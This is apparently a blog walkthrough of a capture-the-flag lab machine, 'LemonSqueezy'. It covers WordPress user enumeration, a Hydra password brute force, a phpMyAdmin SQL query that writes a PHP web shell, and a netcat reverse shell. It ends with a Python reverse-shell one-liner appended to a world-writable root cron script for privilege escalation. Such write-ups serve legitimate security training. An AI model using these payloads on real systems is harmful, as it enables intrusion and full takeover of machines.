This includes enumerating Wordpress and PhpMyAdmin to get the user shell and then exploiting a cron job running on the machine to get root. I’ve added the machine to my hosts file. Let’s dive in.
root@kali:~# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 192.168.1.12 lemonsqueezy
I started the reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.
root@kali:~# nmap -sC -sV -oA nmap/LemonSqueezy lemonsqueezy Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 16:12 IST Nmap scan report for lemonsqueezy (192.168.1.12) Host is up (0.00036s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Apache2 Debian Default Page: It works MAC Address: 08:00:27:72:86:BF (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds
The port80 was open which displayed the Default Apache2 Page. Next, I used Gobuster to search for hidden directories and found two directories named wordpress and phpmyadmin.
I decided to enumerate the wordpress directory first which was running a default wordpress theme.
I ran wpscan to enumerate for wordpress users and found two users named lemon and orange.
root@kali:~# wpscan --url http://lemonsqueezy/wordpress/ --enumerate u ... [i] User(s) Identified: [+] lemon | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://lemonsqueezy/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] orange | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) ...
The next goal was to log into wordpress, I tried some random passwords with the usernames but none of them worked. So the next option was to brute force the login. For this, I set up a burp proxy and captured the login request.
Then I used hydra to brute force the login credentials for user orange and found the password ginger.
root@kali:~# hydra lemonsqueezy http-form-post "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:incorrect" -l orange -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-15 16:19:50 [DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task [DATA] attacking http-post-form://lemonsqueezy:80/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:incorrect [http-post-form] host: lemonsqueezy login: orange password: ginger 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-15 16:20:05
After logging in as user orange, I found a post draft named “Keep this Safe” which contained some text, most probably a password.
After some guesses, I found that this password can be used to login into the phpmyadmin page with the username orange and password nOt1n@wOrdl1st!
Then, I went to the SQL tab, where we can execute SQL queries on localhost and created a simple php backdoor.
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"
The command executed without any errors. Then I went to the location, where the backdoor was created and executed the id command.
That was a success! Now it was time to get a netcat reverse shell back to the host machine and read our first flag!
root@kali:~# nc -lvnp 9001 listening on [any] 9001 ...connect to [192.168.1.11] from (UNKNOWN) [192.168.1.12] 50462 python -c 'import pty;pty.spawn("/bin/bash")' www-data@lemonsqueezy:/var/www/html/wordpress$ cd /var/www/ cd /var/www www-data@lemonsqueezy:/var/www$ cat user.txt cat user.txt TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH www-data@lemonsqueezy:/var/www$
For further enumeration, I uploaded the pspy script to look for running processes. To transfer files, I started a python http server on my host machine, and then downloaded it using wget on the target machine.
root@kali:~# python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
www-data@lemonsqueezy:/home/orange$ cd /dev/shm cd /dev/shm www-data@lemonsqueezy:/dev/shm$ wget http://192.168.1.11:8000/pspy64 wget http://192.168.1.11:8000/pspy64 --2020-06-15 20:31:41-- http://192.168.1.11:8000/pspy64 Connecting to 192.168.1.11:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: 'pspy64' pspy64 100%[===================>] 2.94M --.-KB/s in 0.04s 2020-06-15 20:31:41 (82.9 MB/s) - 'pspy64' saved [3078592/3078592] www-data@lemonsqueezy:/dev/shm$ chmod +x pspy64 chmod +x pspy64
Then I gave it executable permissions and after executing the script, I found a logrotate process running as root which repeats itself after some interval.
I went to /etc/logrotate.d/ directory and found that the logrotate is a python script which is world writable.
www-data@lemonsqueezy:/dev/shm$ cd /etc/logrotate.d/ cd /etc/logrotate.d/ www-data@lemonsqueezy:/etc/logrotate.d$ ls -lah ls -lah total 56K drwxr-xr-x 2 root root 4.0K Apr 26 14:45 . drwxr-xr-x 122 root root 12K Jun 15 20:07 .. -rw-r--r-- 1 root root 433 Oct 14 2019 apache2 -rw-r--r-- 1 root root 173 Sep 14 2017 apt -rw-r--r-- 1 root root 107 Sep 21 2016 dbconfig-common -rw-r--r-- 1 root root 232 Jun 10 2015 dpkg -rwxrwxrwx 1 root root 101 Apr 26 14:45 logrotate -rw-r--r-- 1 root root 802 Jan 29 16:49 mysql-server -rw-r--r-- 1 root root 94 Feb 21 07:38 ppp -rw-r--r-- 1 root root 515 Jan 19 2017 rsyslog -rw-r--r-- 1 root root 513 Aug 2 2017 speech-dispatcher -rw-r--r-- 1 root root 235 Dec 11 2016 unattended-upgrades www-data@lemonsqueezy:/etc/logrotate.d$ file logrotate file logrotate logrotate: Python script, ASCII text executable www-data@lemonsqueezy:/etc/logrotate.d$
I replaced the contents of the logrotate with a python reverse shell and opened a listener on another terminal.
www-data@lemonsqueezy:/etc/logrotate.d$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >> logrotate
Within a few minutes, a reverse shell popped in and I was able to read the final flag!
root@kali:~# nc -lvnp 9000 listening on [any] 9000 ... connect to [192.168.1.11] from (UNKNOWN) [192.168.1.12] 58776 root@lemonsqueezy:~# cat root.txt cat root.txt NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Ekaterina Rogova .